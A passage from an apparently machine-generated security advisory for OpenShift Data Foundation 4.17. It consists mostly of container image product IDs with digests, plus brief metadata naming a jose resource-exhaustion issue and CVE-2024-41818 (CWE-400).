"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "jose: resource exhaustion", }, { cve: "CVE-2024-41818", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2024-07-29T16:24:42+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", 